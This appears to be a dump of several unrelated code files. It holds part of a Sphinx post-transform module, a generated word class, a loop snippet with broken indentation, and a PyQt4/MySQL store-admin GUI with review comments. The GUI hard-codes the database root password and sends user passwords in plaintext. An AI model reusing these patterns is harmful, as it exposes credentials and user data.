        # Give extensions a chance to swallow the warning, then fall back
        # to the most specific message available.
        if self.app.emit_firstresult('warn-missing-reference', domain, node):
            return
        elif domain and typ in domain.dangling_warnings:
            msg = domain.dangling_warnings[typ] % {'target': target}
        elif node.get('refdomain', 'std') not in ('', 'std'):
            msg = (__('%s:%s reference target not found: %s') %
                   (node['refdomain'], typ, target))
        else:
            msg = __('%r reference target not found: %s') % (typ, target)
        logger.warning(msg, location=node, type='ref', subtype=typ)

    def find_pending_xref_condition(self, node: pending_xref, conditions: Sequence[str],
                                    ) -> list[Node] | None:
        # Return the children of the first matching condition, in the
        # order given by *conditions*.
        for condition in conditions:
            matched = find_pending_xref_condition(node, condition)
            if matched:
                return matched.children
        return None
class OnlyNodeTransform(SphinxPostTransform):
    """Filter ``only`` directive nodes against the builder's active tags."""
    default_priority = 50

    def run(self, **kwargs: Any) -> None:
        # A comment on the comment() nodes being inserted: replacing by [] would
        # result in a "Losing ids" exception if there is a target node before
        # the only node, so we make sure docutils can transfer the id to
        # something, even if it's just a comment and will lose the id anyway...
        process_only_nodes(self.document, self.app.builder.tags)
class SigElementFallbackTransform(SphinxPostTransform):
    """Fallback various desc_* nodes to inline if translator does not support them."""
    default_priority = 200

    def run(self, **kwargs: Any) -> None:
        def has_visitor(translator: type[nodes.NodeVisitor], node: type[Element]) -> bool:
            return hasattr(translator, "visit_%s" % node.__name__)

        try:
            translator = self.app.builder.get_translator_class()
        except AttributeError:
            # do nothing if no translator class is specified (e.g., on a dummy builder)
            return

        if issubclass(translator, SphinxTranslator):
            # subclass of SphinxTranslator supports desc_sig_element nodes automatically.
            return

        # for the leaf elements (desc_sig_element), the translator should support _all_,
        # unless there exists a generic visit_desc_sig_element default visitor
        if (not all(has_visitor(translator, node) for node in addnodes.SIG_ELEMENTS)
                and not has_visitor(translator, addnodes.desc_sig_element)):
            self.fallback(addnodes.desc_sig_element)

        if not has_visitor(translator, addnodes.desc_inline):
            self.fallback(addnodes.desc_inline)

    def fallback(self, node_type: Any) -> None:
        """Translate nodes of type *node_type* to docutils inline nodes.

        The original node type name is stored as a string in a private
        ``_sig_node_type`` attribute if the latter did not exist.
        """
        for node in self.document.findall(node_type):
            # Rebuild as a plain inline node carrying the same attributes
            # and children, so any translator can render it.
            newnode = nodes.inline()
            newnode.update_all_atts(node)
            newnode.extend(node)
            # Only set _sig_node_type if not defined by the user
            newnode.setdefault('_sig_node_type', node.tagname)
            node.replace_self(newnode)
class PropagateDescDomain(SphinxPostTransform):
    """Add the domain name of the parent node as a class in each desc_signature node."""
    default_priority = 200

    def run(self, **kwargs: Any) -> None:
        for node in self.document.findall(addnodes.desc_signature):
            # Copy the parent desc node's domain (e.g. 'py', 'c') onto the
            # signature's classes so output can be styled per domain.
            if node.parent.get('domain'):
                node['classes'].append(node.parent['domain'])
def setup(app: Sphinx) -> dict[str, Any]:
    # Register the built-in post-transforms with the Sphinx application
    # and declare parallel-safety metadata for this extension.
    app.add_post_transform(ReferencesResolver)
    app.add_post_transform(OnlyNodeTransform)
    app.add_post_transform(SigElementFallbackTransform)
    app.add_post_transform(PropagateDescDomain)

    return {
        'version': 'builtin',
        'parallel_read_safe': True,
        'parallel_write_safe': True,
    }
997,762 | 7f952b6b152e8c76216268b5c4cd7a97b8a3167b |
from xai.brain.wordbase.nouns._watchtower import _WATCHTOWER
# class header
class _WATCHTOWERS(_WATCHTOWER, ):
    # Auto-generated word entry: plural noun "watchtowers", derived from
    # the singular _WATCHTOWER base class.
    def __init__(self,):
        _WATCHTOWER.__init__(self)
        self.name = "WATCHTOWERS"
        self.specie = 'nouns'
        self.basic = "watchtower"
        self.jsondata = {}
997,763 | 16864dea148107076a2c6ea45b9827fd87f0eb83 | for i in range(1, 11):
# If i is equals to 6,
# continue to next iteration
# without printing
if i == 6:
continue
else:
# otherwise print the value
# of i
print(i, end=" ")
|
997,764 | 8ab2c2bcb8d2cebfc7b5bee11fbe0fdfc0a41582 | import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from zoket import client
import MySQLdb
import string
class MyTableModel(QAbstractTableModel):
    # Read-only table model over a 2-D sequence (rows of columns),
    # e.g. the tuples returned by a MySQL cursor.fetchall().
    def __init__(self, datain, parent=None, *args):
        QAbstractTableModel.__init__(self, parent, *args)
        self.arraydata = datain  # row-major data backing the model

    def rowCount(self, parent):
        return len(self.arraydata)

    def columnCount(self, parent):
        # Column count is taken from the first row, so this raises
        # IndexError on an empty result set — TODO confirm callers never
        # pass empty data.
        return len(self.arraydata[0])

    def data(self, index, role):
        # Only the display role is served; anything else gets an invalid
        # QVariant.
        if not index.isValid():
            return QVariant()
        elif role != Qt.DisplayRole:
            return QVariant()
        return QVariant(self.arraydata[index.row()][index.column()])
class Ui_Dialog(object):
    """Helpers that pop up modal message boxes (error / confirmation)."""

    def showEMessageBox(self, message):
        """Show a modal warning box with the given error message."""
        msg = QMessageBox()
        # Bug fix: this line previously read ``msq.setIcon(...)`` —
        # ``msq`` is undefined, so every call raised NameError before the
        # dialog could be shown.
        msg.setIcon(QMessageBox.Warning)
        msg.setWindowTitle("Error")
        msg.setInformativeText(message)
        msg.setStandardButtons(QMessageBox.Ok)
        msg.exec_()

    def showCMessageBox(self, message):
        """Show a modal information (confirmation) box."""
        msg = QMessageBox()
        msg.setIcon(QMessageBox.Information)
        # NOTE(review): the title says "Error" although this is the
        # confirmation box — looks like copy-paste; confirm before changing
        # the user-facing string.
        msg.setWindowTitle("Error")
        msg.setInformativeText(message)
        msg.setStandardButtons(QMessageBox.Ok)
        msg.exec_()
################# Everything related to articles below ###################
class listaa(QMainWindow):
    # Window listing all articles (joined with their category) in a
    # read-only table.
    def __init__(self):
        QMainWindow.__init__(self)
        artitable = QTableView()
        layout = QHBoxLayout()
        layout.addWidget(artitable)
        # NOTE(review): database credentials are hard-coded — move them to
        # configuration before sharing or deploying this code.
        con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
        cursor = con.cursor()
        cursor.execute("SELECT idArticulos, Articulos.Descripcion, stock, precio_unitario, Categoria.Descripcion FROM Articulos, Categoria WHERE Cod_categoria = idCategoria;")
        save = cursor.fetchall()
        tablemodel = MyTableModel(save, self)
        artitable.setModel(tablemodel)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Lista de articulos")
class agregara(QMainWindow):
    # "Add article" window: a five-field form whose Agregar button sends an
    # "insertarA" protocol message through the zoket client.
    def __init__(self):
        QMainWindow.__init__(self)
        # NOTE(review): module-level globals share the widgets with
        # inserta(); instance attributes (self.cod, ...) would be safer.
        global cod, desc, st,pre,cat
        l1 = QLabel("Codigo de Articulo")
        cod = QTextEdit()
        l2 = QLabel("Descripcion")
        desc = QTextEdit()
        l3 = QLabel("Cantidads")
        st = QTextEdit()
        l4 = QLabel("Precio")
        pre = QTextEdit()
        l5 = QLabel("Categoria")
        cat = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,cod)
        fbox.addRow(l2,desc)
        fbox.addRow(l3,st)
        fbox.addRow(l4,pre)
        fbox.addRow(l5,cat)
        button1 = QPushButton("Agregar")
        fbox.addRow(button1)
        self.connect(button1, SIGNAL('clicked()'), self.inserta)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Agregar articulos")

    def inserta(self):
        # Validate the form fields; on the first failure show an error box,
        # otherwise send "insertarA, id, desc, qty, price, category".
        abc = client()
        prot = "insertarA"
        uid = cod.toPlainText()
        nm = desc.toPlainText()
        ape= st.toPlainText()
        cor= pre.toPlainText()
        tel= cat.toPlainText()
        ms = Ui_Dialog()
        if(str(uid).isalpha() or uid == "" or int(uid)<0):
            ms.showEMessageBox("Id no puede contener letras o estar vacio y no puede ser menor a 0")
        elif(nm==""):
            ms.showEMessageBox("Descripcion vacio")
        elif(ape==""):
            # NOTE(review): only emptiness is checked here, although the
            # message also promises letter/negative checks.
            ms.showEMessageBox("Cantidad vacio, tiene letras o es menor a 0")
        elif(str(cor).isalpha() or cor=="" or int(cor)<0):
            ms.showEMessageBox("el precio esta vacio, tiene letras o es menor a 0")
        elif(str(tel).isalpha() or tel=="" or int(tel)<0):
            ms.showEMessageBox("la categoria esta vacio o tiene alguna letra en su contenedor y no puede ser menor a 0")
        else:
            mess1 = "%s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel)
            met = mess1
            abc.send(met)
            ms.showCMessageBox("Exito")
class editara(QMainWindow):
    # "Edit article" window: the same five-field form as agregara, but the
    # Actualizar button sends an "UpdateA" protocol message instead.
    def __init__(self):
        QMainWindow.__init__(self)
        # NOTE(review): shares the same module-level globals as agregara,
        # so whichever window was opened last owns the widgets.
        global cod, desc, st,pre,cat
        l1 = QLabel("Codigo de Articulo")
        cod = QTextEdit()
        l2 = QLabel("Descripcion")
        desc = QTextEdit()
        l3 = QLabel("Stock")
        st = QTextEdit()
        l4 = QLabel("Precio")
        pre = QTextEdit()
        l5 = QLabel("Categoria")
        cat = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,cod)
        fbox.addRow(l2,desc)
        fbox.addRow(l3,st)
        fbox.addRow(l4,pre)
        fbox.addRow(l5,cat)
        p1 = QPushButton("Actualizar")
        fbox.addRow(p1)
        self.connect(p1, SIGNAL('clicked()'), self.actuar)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Editar articulos")

    def actuar(self):
        # Validate the form fields; on the first failure show an error box,
        # otherwise send "UpdateA, id, desc, stock, price, category".
        abc = client()
        prot = "UpdateA"
        uid = cod.toPlainText()
        nm = desc.toPlainText()
        ape= st.toPlainText()
        cor= pre.toPlainText()
        tel= cat.toPlainText()
        ms= Ui_Dialog()
        if(str(uid).isalpha() or uid == "" or int(uid)<0):
            ms.showEMessageBox("Id no puede contener letras o estar vacio y no puede ser menor a 0")
        elif(nm==""):
            ms.showEMessageBox("Descripcion vacio")
        elif(ape==""):
            # NOTE(review): only emptiness is checked, same as in agregara.
            ms.showEMessageBox("Cantidad vacio, tiene letras o es menor a 0")
        elif(str(cor).isalpha() or cor=="" or int(cor)<0):
            ms.showEMessageBox("el precio esta vacio, tiene letras o es menor a 0")
        elif(str(tel).isalpha() or tel=="" or int(tel)<0):
            ms.showEMessageBox("la categoria esta vacio o tiene alguna letra en su contenedor y no puede ser menor a 0")
        else:
            mess1 = "%s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel)
            met = mess1
            abc.send(met)
            ms.showCMessageBox("Articulo Actualizad@")
class eliminara(QMainWindow):
    """Window for deleting an article by its code."""
    def __init__(self):
        QMainWindow.__init__(self)
        # BUG FIX: 'cod' used to be a plain local here, while elia() reads the
        # module-level global 'cod' -- i.e. whatever text field another window
        # (agregara/editara) created last. Declare it global so this window's
        # own field is the one read, matching the sibling classes.
        global cod
        l1 = QLabel("Codigo de Articulo")
        cod = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,cod)
        button = QPushButton("Eliminar")
        fbox.addRow(button)
        self.connect(button, SIGNAL('clicked()'), self.elia)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Eliminar articulos")
    def elia(self):
        """Validate the id and send an 'Eliminar, Artic, <id>' command."""
        abc = client()
        prot = "Eliminar"
        prot2 = "Artic"
        ed=cod.toPlainText()
        ms= Ui_Dialog()
        if(str(ed).isalpha() or ed == "" or int(ed)<0):
            ms.showEMessageBox("Id no puede contener letras o estar vacio o ser menor a 0")
        else:
            mess1 = "%s, %s, %s"%(prot,prot2,ed)
            met = mess1
            abc.send(met)
            # BUG FIX: the confirmation used to say "Usuario Eliminao" (copy-
            # pasted from the user-deletion window) although this deletes an article.
            ms.showCMessageBox("Articulo Eliminado!")
class articulos(QMainWindow):
    """Menu window for article administration (list / add / edit / delete)."""
    def __init__(self):
        QMainWindow.__init__(self)
        layout = QHBoxLayout()
        button = QPushButton("Lista de articulos disponibles")
        button2 = QPushButton("Agregar articulos")
        button3 = QPushButton("Editar articulos")
        button4 = QPushButton("Eliminar articulos")
        layout.addWidget(button)
        layout.addWidget(button2)
        layout.addWidget(button3)
        layout.addWidget(button4)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Administrar Articulos")
        # Each button opens the corresponding child window.
        self.connect(button, SIGNAL('clicked()'), self.listaa)
        self.connect(button2, SIGNAL('clicked()'), self.agregara)
        self.connect(button3, SIGNAL('clicked()'), self.editara)
        self.connect(button4, SIGNAL('clicked()'), self.eliminara)
    def listaa(self):
        # Keep a reference on self so the child window is not garbage-collected.
        self.mylista = listaa()
        self.mylista.show()
    def agregara(self):
        self.myadda = agregara()
        self.myadda.show()
    def editara(self):
        self.myedita = editara()
        self.myedita.show()
    def eliminara(self):
        self.mydeleta = eliminara()
        self.mydeleta.show()
################# aca para arriba ^ articulos#########
################# Todo lo de ventas Aca abajo###################
class registro_ventas(QMainWindow):
    """Window showing the full sales register (Facturacion joined to Usuarios)."""
    def __init__(self):
        QMainWindow.__init__(self)
        ventastable = QTableView()
        layout = QHBoxLayout()
        layout.addWidget(ventastable)
        # NOTE(review): DB credentials are hard-coded; connection is never closed.
        con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
        cursor = con.cursor()
        cursor.execute("SELECT idFacturacion as '#Factura', Fecha, nombrart as 'Articulo Vendido', Precio_total as 'Precio Unitario', Nombre as 'Comprador', idUsuarios as 'id' FROM Facturacion,Usuarios where User_id = idUsuarios;")
        save = cursor.fetchall()
        tablemodel = MyTableModel(save, self)
        ventastable.setModel(tablemodel)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Registro de ventas")
class ventas_por_categoria(QMainWindow):
    """Window showing sales filtered by a category name typed by the user."""
    def __init__(self):
        QMainWindow.__init__(self)
        global buscar, Ventasxc
        button = QPushButton("Buscar")
        buscar= QTextEdit()
        con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
        Ventasxc= QTableView()
        layout = QHBoxLayout()
        layout.addWidget(Ventasxc)
        leyout = QVBoxLayout()
        leyout.addWidget(button)
        leyout.addWidget(buscar)
        layout.addLayout(leyout)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Ventas por Categoria")
        self.connect(button, SIGNAL('clicked()'), self.llenartablita)
    def llenartablita(self):
        """Fill the table with sales whose article belongs to the searched category."""
        con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
        cursor = con.cursor()
        tent = buscar.toPlainText()
        # BUG FIX (security): the category name used to be %-interpolated
        # straight into the SQL text (SQL injection); it is now passed as a
        # bound parameter. Also joins Articulos to Categoria explicitly --
        # without "Cod_categoria = idCategoria" (the same join used by the
        # article list) the Categoria filter was a cartesian product and did
        # not restrict rows by the article's actual category.
        cursor.execute(
            "SELECT idFacturacion as '#Factura', Fecha, nombrart as 'Articulo Vendido', "
            "Precio_total as 'Precio Unitario', Nombre as 'Comprador', idUsuarios as 'id' "
            "FROM Facturacion, Articulos, Usuarios, Categoria "
            "where nombrart=Articulos.Descripcion AND User_id = idUsuarios "
            "and Articulos.Cod_categoria = Categoria.idCategoria "
            "and Categoria.Descripcion = %s;",
            (str(tent),))
        save = cursor.fetchall()
        tablemodel = MyTableModel(save, self)
        Ventasxc.setModel(tablemodel)
class ventas(QMainWindow):
    """Menu window for the sales reports (full register / by category)."""
    def __init__(self):
        QMainWindow.__init__(self)
        layout = QHBoxLayout()
        button = QPushButton("Registro de ventas")
        button2= QPushButton("Registro de ventas por categoria")
        layout.addWidget(button)
        layout.addWidget(button2)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Ventas")
        self.connect(button, SIGNAL('clicked()'), self.registro)
        self.connect(button2, SIGNAL('clicked()'), self.registroc)
    def registro(self):
        # Keep a reference so the child window survives garbage collection.
        self.myreg = registro_ventas()
        self.myreg.show()
    def registroc(self):
        self.myregc = ventas_por_categoria()
        self.myregc.show()
################# aca para arriba ^ Ventas#########
################# Todo lo de Categorias Aca abajo###################
class listac(QMainWindow):
    """Window listing every row of the Categoria table."""
    def __init__(self):
        QMainWindow.__init__(self)
        # NOTE(review): self.widget is assigned twice (here and below); this
        # first assignment is redundant.
        self.widget = QWidget()
        cattable = QTableView()
        layout = QHBoxLayout()
        layout.addWidget(cattable)
        con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
        cursor = con.cursor()
        cursor.execute("SELECT * FROM Categoria;")
        save = cursor.fetchall()
        tablemodel = MyTableModel(save, self)
        cattable.setModel(tablemodel)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Lista de categorias")
class agregarc(QMainWindow):
    """Window for adding a new category (id + description)."""
    def __init__(self):
        QMainWindow.__init__(self)
        global cod, desc
        l1 = QLabel("Codigo de Categoria")
        cod = QTextEdit()
        l2 = QLabel("Descripcion")
        desc = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,cod)
        fbox.addRow(l2,desc)
        button1= QPushButton("Agregar")
        fbox.addRow(button1)
        self.connect(button1, SIGNAL('clicked()'), self.insertc)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Agregar categoria")
    def insertc(self):
        """Validate the fields and send an 'Insertarad, Categoria, ...' command."""
        abc = client()
        prot = "Insertarad"
        prot2 = "Categoria"
        de=cod.toPlainText()
        dcp=desc.toPlainText()
        ms= Ui_Dialog()
        # BUG FIX: test for the empty string BEFORE int(de); the old order
        # ("isalpha() or int(de)<0 or de==''") called int("") first and
        # crashed with ValueError whenever the id field was left blank.
        if(de=="" or str(de).isalpha() or int(de)<0):
            ms.showEMessageBox("Id no puede contener letras ni ser menor a 0")
        elif(dcp==""):
            ms.showEMessageBox("La descripcion esta vacia")
        else:
            mess1 = "%s, %s, %s, %s"%(prot,prot2,de,dcp)
            met = mess1
            abc.send(met)
            ms.showCMessageBox("Exito")
class editarc(QMainWindow):
    """Window for updating a category's description, keyed by its old id."""
    def __init__(self):
        QMainWindow.__init__(self)
        global cod, cod1,desc
        l1 = QLabel("Codigo de Categoria Viejo")
        cod = QTextEdit()
        l2 = QLabel("Descripcion Nueva")
        desc = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,cod)
        fbox.addRow(l2,desc)
        p1 = QPushButton("Actualizar")
        fbox.addRow(p1)
        self.connect(p1, SIGNAL('clicked()'), self.actuC)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Editar categoria")
    def actuC(self):
        """Validate the fields and send an 'Updatead, Categoria, ...' command."""
        abc = client()
        prot = "Updatead"
        prot2 = "Categoria"
        ed=cod.toPlainText()
        de = ed
        dcp=desc.toPlainText()
        ms= Ui_Dialog()
        # BUG FIX: test for the empty string BEFORE int(de); the old order
        # called int("") first and crashed with ValueError on a blank id field.
        if(de=="" or str(de).isalpha() or int(de)<0):
            ms.showEMessageBox("Id no puede contener letras ni ser menor a 0")
        elif(dcp==""):
            ms.showEMessageBox("La descripcion esta vacia")
        else:
            mess1 = "%s, %s, %s, %s"%(prot,prot2,ed,dcp)
            met = mess1
            abc.send(met)
            ms.showCMessageBox("Categoria Actualizada")
class eliminarc(QMainWindow):
    """Window for deleting a category by its id."""
    def __init__(self):
        QMainWindow.__init__(self)
        # The text field lives in a module-level global shared with the
        # other category windows.
        global cod
        l1 = QLabel("Codigo de Categoria")
        cod = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,cod)
        button = QPushButton("Eliminar")
        fbox.addRow(button)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Eliminar categoria")
        self.connect(button, SIGNAL('clicked()'), self.elic)
    def elic(self):
        """Validate the id and send an 'Eliminar, Categoria, <id>' command."""
        abc = client()
        prot = "Eliminar"
        prot2 = "Categoria"
        ed=cod.toPlainText()
        ms= Ui_Dialog()
        # NOTE(review): int(ed) can still raise for mixed input like "1a".
        if(str(ed).isalpha() or ed == "" or int(ed)<0):
            ms.showEMessageBox("Id no puede contener letras o estar vacio o ser menor a 0")
        else:
            mess1 = "%s, %s, %s"%(prot,prot2,ed)
            met = mess1
            abc.send(met)
            # NOTE(review): message says "Usuario" although a category was
            # deleted -- looks copy-pasted; confirm with product owner.
            ms.showCMessageBox("Usuario Eliminao!!!! FOREVA!")
class Categorias(QMainWindow):
    """Menu window for category administration (list / add / edit / delete)."""
    def __init__(self):
        QMainWindow.__init__(self)
        layout = QHBoxLayout()
        button = QPushButton("Lista de categorias disponibles")
        button2 = QPushButton("Agregar categorias")
        button3 = QPushButton("Editar categorias")
        button4 = QPushButton("Eliminar categorias")
        layout.addWidget(button)
        layout.addWidget(button2)
        layout.addWidget(button3)
        layout.addWidget(button4)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Categorias")
        self.connect(button, SIGNAL('clicked()'), self.listac)
        self.connect(button2, SIGNAL('clicked()'), self.agregarc)
        self.connect(button3, SIGNAL('clicked()'), self.editarc)
        self.connect(button4, SIGNAL('clicked()'), self.eliminarc)
    def listac(self):
        # Keep a reference on self so the child window is not garbage-collected.
        self.mylistc = listac()
        self.mylistc.show()
    def agregarc(self):
        self.myaddc = agregarc()
        self.myaddc.show()
    def editarc(self):
        self.myeditc = editarc()
        self.myeditc.show()
    def eliminarc(self):
        self.mydeletc = eliminarc()
        self.mydeletc.show()
################# aca para arriba ^ categorias#########
################# Todo lo de Usuarios Aca abajo###################
class listau(QMainWindow):
    """Window listing all users joined to their country and user type."""
    def __init__(self):
        QMainWindow.__init__(self)
        # NOTE(review): self.widget is assigned twice; this first one is redundant.
        self.widget = QWidget()
        clientetable = QTableView()
        layout = QHBoxLayout()
        layout.addWidget(clientetable)
        con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
        cursor = con.cursor()
        cursor.execute("SELECT idUsuarios, Nombre, Apellidos, Correo, Telefono, Descrip as 'Pais', Cod_postal as 'Codigo postal' , Descripcion as 'Tipo Usuario' FROM Usuarios, Pais, Tipo_usuario where cod_pais = idPais and Tipo_usuario = Cod_Tipo_Usuario;")
        save = cursor.fetchall()
        tablemodel = MyTableModel(save, self)
        clientetable.setModel(tablemodel)
        self.widget = QWidget()
        self.widget.setLayout(layout)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Lista de usuarios")
class agregaru(QMainWindow):
    """Window for registering a new user (id, name, contact, type, country, password)."""
    def __init__(self):
        QMainWindow.__init__(self)
        l1 = QLabel("Cedula")
        # NOTE(review): input widgets are module-level globals shared with editaru.
        global ida, nom, ap, corr, telf, tip, pais, cod, contr
        ida= QTextEdit()
        l2 = QLabel("Nombre")
        nom = QTextEdit()
        l3 = QLabel("Apellido")
        ap = QTextEdit()
        l4 = QLabel("Correo")
        corr = QTextEdit()
        l10 = QLabel("Telefono")
        telf = QTextEdit()
        l5 = QLabel("Tipo de Usuario")
        tip = QTextEdit()
        l6 = QLabel("Pais")
        pais = QTextEdit()
        l7 = QLabel("Codigo Postal")
        cod = QTextEdit()
        l8 = QLabel("Contrasena")
        contr = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,ida)
        vbox = QVBoxLayout()
        vbox.addWidget(nom)
        fbox.addRow(l2,vbox)
        fbox.addRow(l3,ap)
        fbox.addRow(l4,corr)
        fbox.addRow(l10,telf)
        fbox.addRow(l5,tip)
        fbox.addRow(l6,pais)
        fbox.addRow(l7,cod)
        fbox.addRow(l8,contr)
        button1 = QPushButton("Registrar")
        fbox.addRow(button1)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Agregar usuarios")
        self.connect(button1, SIGNAL('clicked()'), self.insertt)
    def insertt(self):
        """Validate all fields and send a 'UsuarioI' (insert user) command."""
        abc = client()
        prot = "UsuarioI"
        uid = ida.toPlainText()
        nm = nom.toPlainText()
        ape= ap.toPlainText()
        cor= corr.toPlainText()
        tel = telf.toPlainText()
        cp= pais.toPlainText()
        cps= cod.toPlainText()
        contra = contr.toPlainText()
        tipo= tip.toPlainText()
        ms= Ui_Dialog()
        if(str(uid).isalpha() or uid == ""):
            ms.showEMessageBox("Id no puede contener letras o estar vacio")
        elif(nm==""):
            ms.showEMessageBox("el Nombre esta vacio")
        elif(ape==""):
            ms.showEMessageBox("el apellido esta vacio")
        elif(cor==""):
            ms.showEMessageBox("el correo esta vacio")
        elif(str(tel).isalpha() or tel=="" or int(tel)<0):
            ms.showEMessageBox("el telefono esta vacio o tiene alguna letra en su contenedor o es menor a 0")
        elif(str(cp).isalpha() or cp=="" or int(cp)<0):
            ms.showEMessageBox("el codigo pais esta vacio o tiene letras en su contenedor o es menor a 0")
        elif(str(cps).isalpha() or cps=="" or int(cps)<0):
            ms.showEMessageBox("Codigo postal esta vacio, tiene letras o es menor a 0")
        elif(contra==""):
            ms.showEMessageBox("Password esta vacio")
        elif(str(tipo).isalpha() or tipo=="" or int(tipo)<0):
            ms.showEMessageBox("el tipo esta vacio o tiene letras en su contenedor")
        else:
            # Wire protocol: "UsuarioI, id, name, surname, mail, phone, country, postal, password, type".
            mess1 = "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel,cp,cps,contra,tipo)
            met = mess1
            abc.send(met)
            # NOTE(review): success message says "Actualizad@" although this
            # is an insert, not an update -- looks copy-pasted; confirm.
            ms.showCMessageBox("Usuario Actualizad@")
class editaru(QMainWindow):
    """Window for updating an existing user, keyed by the cedula (id)."""
    def __init__(self):
        QMainWindow.__init__(self)
        # NOTE(review): input widgets are module-level globals shared with agregaru.
        global ced, nom, ap, corr, tip, pais, cod, contr,telf
        l1 = QLabel("Cedula")
        ced = QTextEdit()
        l2 = QLabel("Nombre")
        nom = QTextEdit()
        l3 = QLabel("Apellido")
        ap = QTextEdit()
        l4 = QLabel("Correo")
        corr = QTextEdit()
        l5 = QLabel("Tipo de Usuario")
        tip = QTextEdit()
        l6 = QLabel("Pais")
        pais = QTextEdit()
        l7 = QLabel("Codigo Postal")
        cod = QTextEdit()
        l8 = QLabel("Contrasena")
        contr = QTextEdit()
        l9 = QLabel("Telefono")
        telf = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,ced)
        vbox = QVBoxLayout()
        vbox.addWidget(nom)
        fbox.addRow(l2,vbox)
        fbox.addRow(l3,ap)
        fbox.addRow(l4,corr)
        fbox.addRow(l9,telf)
        fbox.addRow(l5,tip)
        fbox.addRow(l6,pais)
        fbox.addRow(l7,cod)
        fbox.addRow(l8,contr)
        p1 = QPushButton("Actualizar")
        fbox.addRow(p1)
        self.connect(p1, SIGNAL('clicked()'), self.actu)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Editar Usuarios")
    def actu(self):
        """Validate all fields and send a 'UsuarioU' (update user) command."""
        abc = client()
        prot = "UsuarioU"
        uid = ced.toPlainText()
        nm = nom.toPlainText()
        ape= ap.toPlainText()
        cor= corr.toPlainText()
        tel = telf.toPlainText()
        cp= pais.toPlainText()
        cps= cod.toPlainText()
        contra = contr.toPlainText()
        tipo= tip.toPlainText()
        ms= Ui_Dialog()
        if(str(uid).isalpha() or uid == ""):
            ms.showEMessageBox("Id no puede contener letras o estar vacio")
        elif(nm==""):
            ms.showEMessageBox("el Nombre esta vacio")
        elif(ape==""):
            ms.showEMessageBox("el apellido esta vacio")
        elif(cor==""):
            ms.showEMessageBox("el correo esta vacio")
        elif(str(tel).isalpha() or tel=="" or int(tel)<0):
            ms.showEMessageBox("el telefono esta vacio o tiene alguna letra en su contenedor o es menor a 0")
        elif(str(cp).isalpha() or cp=="" or int(cp)<0):
            ms.showEMessageBox("el codigo pais esta vacio o tiene letras en su contenedor o es menor a 0")
        elif(str(cps).isalpha() or cps=="" or int(cps)<0):
            ms.showEMessageBox("Codigo postal esta vacio, tiene letras o es menor a 0")
        elif(contra==""):
            ms.showEMessageBox("Password esta vacio")
        elif(str(tipo).isalpha() or tipo=="" or int(tipo)<0):
            ms.showEMessageBox("el tipo esta vacio o tiene letras en su contenedor")
        else:
            # Wire protocol: "UsuarioU, id, name, surname, mail, phone, country, postal, password, type".
            mess1 = "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s"%(prot,uid,nm,ape,cor,tel,cp,cps,contra,tipo)
            met = mess1
            abc.send(met)
            ms.showCMessageBox("Usuario Actualizad@")
class eliminaru(QMainWindow):
    """Window for deleting a user by cedula (id)."""
    def __init__(self):
        QMainWindow.__init__(self)
        global ced,nom, ap
        l1 = QLabel("Cedula")
        ced = QTextEdit()
        fbox = QFormLayout()
        fbox.addRow(l1,ced)
        button = QPushButton("Eliminar")
        fbox.addRow(button)
        self.widget = QWidget()
        self.widget.setLayout(fbox)
        self.setCentralWidget(self.widget)
        self.setWindowTitle("Eliminar usuarios")
        self.connect(button, SIGNAL('clicked()'), self.eliu)
    def eliu(self):
        """Validate the id and send an 'Eliminar, User, <id>' command."""
        abc = client()
        prot = "Eliminar"
        prot2 = "User"
        ed=ced.toPlainText()
        ms= Ui_Dialog()
        if(str(ed).isalpha() or ed == "" or int(ed)<0):
            ms.showEMessageBox("Id no puede contener letras o estar vacio o ser menor a 0")
        else:
            mess1 = "%s, %s, %s"%(prot,prot2,ed)
            met = mess1
            abc.send(met)
